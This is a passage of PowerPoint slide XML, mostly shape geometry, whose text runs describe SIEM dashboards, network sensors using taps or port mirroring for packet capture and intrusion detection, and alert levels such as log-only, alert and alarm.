                    <a:pt x="14211" y="559158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6385" y="605262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613" y="652337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="700278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613" y="748218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6385" y="795293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14211" y="841397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24987" y="886426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38608" y="930276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54971" y="972841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73971" y="1014019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95503" y="1053704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119465" y="1091793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145752" y="1128180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174259" y="1162762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204882" y="1195435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237518" y="1226093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272061" y="1254632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308409" y="1280949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346455" y="1304939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386098" y="1326497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427231" y="1345519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469752" y="1361901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513556" y="1375538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558538" y="1386327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604595" y="1394162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651622" y="1398940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699516" y="1400556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747409" y="1398940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="794436" y="1394162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840493" y="1386327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885475" y="1375538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929279" y="1361901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971800" y="1345519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012933" y="1326497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1052576" y="1304939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090622" y="1280949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126970" y="1254632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161513" y="1226093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194149" y="1195435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224772" y="1162762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253279" y="1128180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279566" y="1091793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303528" y="1053704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325060" y="1014019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344060" y="972841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1360423" y="930276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374044" y="886426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1384820" y="841397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392646" y="795293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1397418" y="748218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1399031" y="700278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1397418" y="652337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392646" y="605262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1384820" y="559158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374044" y="514129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1360423" y="470279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344060" y="427714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325060" y="386536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303528" y="346851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279566" y="308762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253279" y="272375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224772" y="237793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194149" y="205120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161513" y="174462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126970" y="145923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090622" y="119606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1052576" y="95616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012933" y="74058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971800" y="55036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929279" y="38654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885475" y="25017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840493" y="14228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="794436" y="6393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747409" y="1615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699516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1505692" y="4615688"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>03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86529" y="6142482"/>
            <a:ext cx="111379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solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>only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905115" y="6142482"/>
            <a:ext cx="6419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60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Alert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313414" y="6142482"/>
            <a:ext cx="80137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65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Alarm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92316" y="306451"/>
            <a:ext cx="30714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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SIEM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="165">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dashboards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96940" y="760476"/>
            <a:ext cx="4247388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00198" y="1882292"/>
            <a:ext cx="12049760" cy="796925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Sensor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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>tap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5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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>port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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>mirror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performs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packet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capture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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>intrusion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detection.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3175">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Uses</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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sensors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are: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988433" y="3974591"/>
            <a:ext cx="1604645" cy="3307079"/>
            <a:chOff x="4988433" y="3974591"/>
            <a:chExt cx="1604645" cy="3307079"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4997958" y="4335017"/>
              <a:ext cx="988060" cy="719455"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="988060" h="719454">
                  <a:moveTo>
                    <a:pt x="0" y="719328"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14719" y="692155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29722" y="664002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45176" y="634991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61249" y="605245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95925" y="544038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135089" y="481361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156774" y="449777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180084" y="418193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205188" y="386732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232252" y="355516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261444" y="324667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292933" y="294309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326886" y="264563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363470" y="235552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402854" y="207399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445205" y="180227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490691" y="154157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539479" y="129312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591737" y="105815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647633" y="83789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707335" y="63355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771010" y="44637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838826" y="27756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910950" y="12836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987551" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19049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972556" y="3974591"/>
              <a:ext cx="620395" cy="620395"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="620395" h="620395">
                  <a:moveTo>
                    <a:pt x="516890" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103378" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63115" y="8116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30257" y="30257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8116" y="63115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="103378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="516890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8116" y="557152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30257" y="590010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63115" y="612151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103378" y="620268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516890" y="620268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557152" y="612151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590010" y="590010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612151" y="557152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620268" y="516890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620268" y="103378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612151" y="63115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590010" y="30257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557152" y="8116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516890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997958" y="5802629"/>
              <a:ext cx="988060" cy="1469390"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="988060" h="1469390">
                  <a:moveTo>
                    <a:pt x="0" y="749808"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14719" y="776980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29722" y="805133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45176" y="834144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61249" y="863890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95925" y="925097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135089" y="987774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156774" y="1019358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180084" y="1050942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205188" y="1082403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232252" y="1113619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261444" y="1144468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292933" y="1174826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326886" y="1204572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363470" y="1233583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402854" y="1261736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445205" y="1288908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490691" y="1314978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539479" y="1339823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591737" y="1363320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647633" y="1385346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707335" y="1405780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771010" y="1424498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838826" y="1441379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910950" y="1456299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987551" y="1469136"/>
                  </a:lnTo>
                </a:path>
                <a:path w="988060" h="1469390">
                  <a:moveTo>
                    <a:pt x="969263" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="237743" y="2159"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="190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6206490" y="4104513"/>
            <a:ext cx="15494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972556" y="5484875"/>
            <a:ext cx="620395" cy="2106295"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="620395" h="2106295">
                <a:moveTo>
                  <a:pt x="620268" y="1589278"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="612140" y="1549019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590003" y="1516164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="557149" y="1494028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516890" y="1485900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103378" y="1485900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63106" y="1494028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30251" y="1516164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8115" y="1549019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1589278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2002802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8115" y="2043061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30251" y="2075916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63106" y="2098052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103378" y="2106168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516890" y="2106168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="557149" y="2098052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590003" y="2075916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="612140" y="2043061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620268" y="2002802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620268" y="1589278"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="620395" h="2106295">
                <a:moveTo>
                  <a:pt x="620268" y="103378"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="612140" y="63119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590003" y="30264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="557149" y="8128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516890" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103378" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63106" y="8128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30251" y="30264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8115" y="63119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="103378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="516890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8115" y="557161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30251" y="590016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63106" y="612152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103378" y="620268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516890" y="620268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="557149" y="612152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590003" y="590016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="612140" y="557161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620268" y="516890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620268" y="103378"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4279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206490" y="5615762"/>
            <a:ext cx="15494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69938" y="4146042"/>
            <a:ext cx="355981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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Source</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>data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67906" y="5566993"/>
            <a:ext cx="490601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20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Aggregate</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>under</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>dashboard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206490" y="7083679"/>
            <a:ext cx="427545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65480" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" baseline="1388" sz="3000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Has </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>per-sensor</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>dashboards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976626" y="4523485"/>
            <a:ext cx="2401570" cy="2401570"/>
            <a:chOff x="2976626" y="4523485"/>
            <a:chExt cx="2401570" cy="2401570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2989326" y="4536185"/>
              <a:ext cx="2376170" cy="2376170"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2376170" h="2376170">
                  <a:moveTo>
                    <a:pt x="1187958" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1140179" y="943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092879" y="3749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046094" y="8383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999859" y="14808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="954208" y="22990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909179" y="32894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864806" y="44482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821125" y="57721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778170" y="72574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735979" y="89006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694586" y="106981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654026" y="126465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614336" y="147421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575551" y="169815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537705" y="193609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500836" y="218770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464977" y="245262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430165" y="273048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396436" y="302094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363824" y="332365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332365" y="363824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302094" y="396436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273048" y="430165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245262" y="464977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218770" y="500836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193609" y="537705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169815" y="575551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147421" y="614336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126465" y="654026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106981" y="694586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89006" y="735979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72574" y="778170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57721" y="821125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44482" y="864806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32894" y="909179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22990" y="954208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14808" y="999859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8383" y="1046094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3749" y="1092879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943" y="1140179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1187958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943" y="1235736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3749" y="1283036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8383" y="1329821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14808" y="1376056"/>
                  </a:lnTo>
                  <a:lnTo>
